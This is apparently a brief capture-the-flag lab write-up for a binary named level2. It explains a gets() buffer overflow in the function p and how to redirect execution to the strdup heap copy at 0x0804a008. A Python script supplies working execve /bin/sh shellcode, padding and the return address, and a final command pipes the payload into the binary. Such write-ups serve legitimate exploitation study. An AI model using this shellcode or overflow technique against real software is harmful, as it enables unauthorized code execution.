
#> nm -nr level2
T main
T p

main just calls p.
p has a buffer [0x4c] and calls gets on it.
Can't overflow on stack because of cmp (and eax, 0xb0000000)
p returns strdup of the buffer.

GOAL: Overflow so EIP -> strdup return : 0x0804a008
      Write shellcode in buffer.

GOOGLE: linux x86 shellcode execve

SCRIPT:
import struct
shellcode = '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80';
offset = 'a' * (0x50 - len(shellcode))
address = struct.pack("<I", 0x804a008)
print shellcode + offset + address

#> cat <(python /tmp/l2.py) - | ./level2
